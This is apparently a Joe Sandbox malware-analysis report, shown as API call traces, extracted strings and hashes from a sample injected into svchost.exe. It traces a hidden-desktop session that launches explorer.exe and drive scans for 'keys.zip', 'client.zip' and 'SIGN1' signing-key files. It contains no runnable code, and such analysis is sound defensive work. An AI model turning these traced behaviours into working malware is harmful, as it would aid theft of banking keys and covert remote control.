                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,02C8797D,7f1bf95c,?,?,?,?,?,?), ref: 02C769D7
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769E2
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C769EA
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C769F5
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02C769FC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1233776721-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFolderMovePath
                                                                                                                                                                                                                    • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                    • API String ID: 1404575960-1083204512
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7734FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3228293703-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C85890,00000000,00000000,00000000), ref: 02C862A4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C862BC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C862CD
                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 02C862D5
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4233414108-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                                      • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                                      • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                                      • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                                      • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                                      • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835F8
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C835FB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C83608
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,76230F10,02C88D9B,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C8360B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 789118668-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocexitfree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3367576030-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C88F7E
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 02C88F85
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(02C890E0,00000008,00000000,02C890E0), ref: 02C88F9F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1494777729-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID: V,@
                                                                                                                                                                                                                    • API String ID: 3664257935-3634209070
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C7C3DF
                                                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02C7C3EA
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C3FD
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 02C7C412
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C421
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,-00000008), ref: 02C7C42D
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C43C
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C447
                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C45A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 02C7C498
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C4A8
                                                                                                                                                                                                                    • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C4B7
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02C7C4CF
                                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 02C7C4D9
                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32 ref: 02C7C4EF
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02C7C4FF
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7C537
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7C53A
                                                                                                                                                                                                                    • GetWindowInfo.USER32(00000000,?), ref: 02C7C54E
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 02C7C5B3
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02C7C5DD
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 02C7C5E9
                                                                                                                                                                                                                    • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02C7C605
                                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02C7C62A
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02C7C63C
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7C645
                                                                                                                                                                                                                    • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7C654
                                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 02C7C65B
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02C7C66F
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02C7C693
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02C7C6A0
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C7C6B0
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000DE), ref: 02C7C6CC
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000F2), ref: 02C7C6D5
                                                                                                                                                                                                                    • LoadIconA.USER32(00000000,00007F00), ref: 02C7C6E1
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02C7C6FB
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 02C7C724
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C7C733
                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02C7C746
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7C769
                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 02C7C787
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 02C7C794
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C7A3
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7C7BB
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                                      • Part of subcall function 02C7C330: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02C7C7C8
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 02C7C837
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000), ref: 02C7C83E
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7C84E
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7C868
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 02C7C87D
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EB), ref: 02C7C88C
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 02C7C898
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7C8A7
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 02C7C8AE
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 02C7C8C3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                                    • String ID: '$<$P0#v$static
                                                                                                                                                                                                                    • API String ID: 2592195760-1574280343
                                                                                                                                                                                                                    • Opcode ID: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
                                                                                                                                                                                                                    • Instruction ID: fd7e9198ded1431252ecc94c8436da75a98c5ce6b82cbdab1c8a503a73804f3d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef69f0a1398285c23b71343fc943ffede84846a0e686b3e3f8ebdbed849b94b7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE19E71A84341AFD3128F64EC88F6A7BA8FB88725F104F19F51AD72C0CB749A51CB61
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDesktopA.USER32 ref: 02C78711
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 02C7872A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C78738
                                                                                                                                                                                                                    • CreateProcessA.KERNEL32 ref: 02C7877C
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C78788
                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 02C787A2
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C787A4
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787D3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C787E1
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C787FB
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C78809
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 02C7880F
                                                                                                                                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C78820
                                                                                                                                                                                                                    • RegisterWindowMessageA.USER32(80f507eba), ref: 02C78848
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C7885D
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(?), ref: 02C788A7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C788B8
                                                                                                                                                                                                                    • CreateProcessA.KERNEL32 ref: 02C78905
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C78911
                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 02C78924
                                                                                                                                                                                                                    • GetShellWindow.USER32 ref: 02C78926
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,?), ref: 02C78955
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02C78963
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7897D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7898B
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 02C78991
                                                                                                                                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 02C789A2
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000083D0,00000000,00000000,00000000), ref: 02C789CF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Handle$CreateDesktop$CloseInformationShellThread$FindProcessSleepmemset$MessageRegister
                                                                                                                                                                                                                    • String ID: 80f507eba$D$D$Shell_TrayWnd$c:\windows$c:\windows\explorer.exe
                                                                                                                                                                                                                    • API String ID: 340731545-4192075031
                                                                                                                                                                                                                    • Opcode ID: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                                    • Instruction ID: 44ee53593746ed547ee0629c9a9b28ec431908d50eb276aea1e373b7e83b79d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dd0f8fbc857005d8b0945f724dcaca625a5c1f17fb0552f53a02aafc3d7cc02
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 029148B1988350AFD312DF65D848B5BBBE8EF88754F108F5AF64983240DB748515CFA2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C911DE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C911F8
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91222
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C91247
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C91287
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91291
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C91299
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C912AA
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C912B1
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 02C912F4
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02C91340
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3,00000000,00000000), ref: 02C91387
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                                    • API String ID: 1576442920-1793234277
                                                                                                                                                                                                                    • Opcode ID: 43b3cffd80596728024a8af44e17c0d32701adb87a282b355a06483f4d1a53d5
                                                                                                                                                                                                                    • Instruction ID: 6cf4f9e84f40e98a3ba9a695ee025706ec90e138cbbabd429458fd5191a74a5b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43b3cffd80596728024a8af44e17c0d32701adb87a282b355a06483f4d1a53d5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6D129309442968FDF168F24D85DBE67BE9EF85304F1886D4E88DD7241DBB1DA48CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8BB47
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8BB69
                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8BB88
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 02C8BBA1
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8BCE4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8BD28
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8BD30
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8BD46
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 02C8BF52
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
                                                                                                                                                                                                                    • String ID: *.00*$.txt$.zip$7F1BFC0D$asus$found.$keys$path
                                                                                                                                                                                                                    • API String ID: 3801700313-2328322984
                                                                                                                                                                                                                    • Opcode ID: 53750372f6315024cead11d43f8b3c4a02f473998cff8e8f2616de3ddc165091
                                                                                                                                                                                                                    • Instruction ID: eb0aa9984d832d5777501823ad65b4b7dba08da0154381e56215e5f837fe31a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53750372f6315024cead11d43f8b3c4a02f473998cff8e8f2616de3ddc165091
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFC1F4315087818FC716DF3894687ABBBE5AFC9348F188A5DE9C9C7250EB31DA09C791
APIs
• memset.MSVCRT ref: 02C8D0E7
• memset.MSVCRT ref: 02C8D109
• GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8D128
• SetErrorMode.KERNEL32(00000001), ref: 02C8D141
• GetDriveTypeA.KERNEL32(?), ref: 02C8D195
• SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
• FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
• GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
• StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
• StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
• FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
• PathAddBackslashA.SHLWAPI(7F1BFCBF), ref: 02C8D284
• CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
• GetLastError.KERNEL32 ref: 02C8D2C8
• IsUserAnAdmin.SHELL32 ref: 02C8D2D0
• PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
• SetLastError.KERNEL32(00000000), ref: 02C8D2E6
• SetErrorMode.KERNEL32(?), ref: 02C8D4F2
Strings
Memory Dump Source
• Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
